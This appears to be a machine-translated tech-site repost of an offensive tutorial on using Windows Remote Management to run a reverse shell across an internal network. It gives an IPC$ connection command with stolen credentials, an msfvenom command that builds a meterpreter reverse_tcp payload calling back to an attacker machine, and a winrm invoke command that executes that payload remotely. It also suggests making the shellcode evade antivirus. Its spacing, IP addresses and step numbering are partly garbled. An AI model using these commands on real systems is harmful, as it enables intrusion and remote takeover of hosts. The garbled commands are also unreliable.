Shulou(Shulou.com)05/31 Report--

How to use WinRM to achieve intranet non-file attack rebound shell, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

0x00: preface

WinRM is the abbreviation of Windows Remote Managementd (win remote Management). Based on the Web Service Management (WS-Management) standard, port 80 or port 443 is used. In this way, we can manage the server remotely if each other has a firewall.

The service is enabled by default in Server2008R2 and upwards systems, and the WinRM service is set to be enabled by default after the Server2012 system. This WinRM service is installed by default in Win7 systems, but it is disabled by default, and WinRM services are enabled by default on both Win8 and Win10 systems.

The advantage of WinRM is that this remote connection is not easy to detect and does not take up the number of remote connections!

0x01: environmental preparation

WinRM will use ports 5985 and 5986, so the firewall must do open processing.

Log in to the attacking machine with an Administrator account

The premise is to know the user login account password of the attacked party.

In the Windows operating system, shared IPC$ is enabled by default

IP:192.168.124.30 (server2016)

IP:192.168.124.20 (win7)

IP:192.168.124.32 (Kali)

0x02: attack process

First, quickly run winrm in (server2016)

Command: winrm quickconfig

II. Net use connection (win7)

Command: net use\\ 192.168.124.20\ ipc$ "password" / user: "user name"

Try calling the local "calc.exe".

Success

Open file sharing for files that need to be accessed remotely in (win7).

Open the shared folder and add permissions for the access user to make it accessible remotely.

4. Place a Trojan horse in (win7) and use (kali) to receive the bounced shell

Generate shellcode

Msfvenom-p windows/x64/meterpreter_reverse_tcp lhost=192.168.124.32 lport=7777-f exe-o. / luomiweixiong.exe

Put "luomiweixiong.exe" in the root directory of (win7) C disk.

3. Kali starts snooping shell mode

Using (server2016) WinRM to realize intranet non-file attack bouncing shell

Execute the following command in (server2016)

Winrm invoke create wmicimv2/win32_process @ {commandline= "\\ 192.168.12.20\ c\ luomiweixiong.exe"}

Rebound successfully

0x03: summary

Shellcode can also do some kill-free treatment to make it more perfect.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.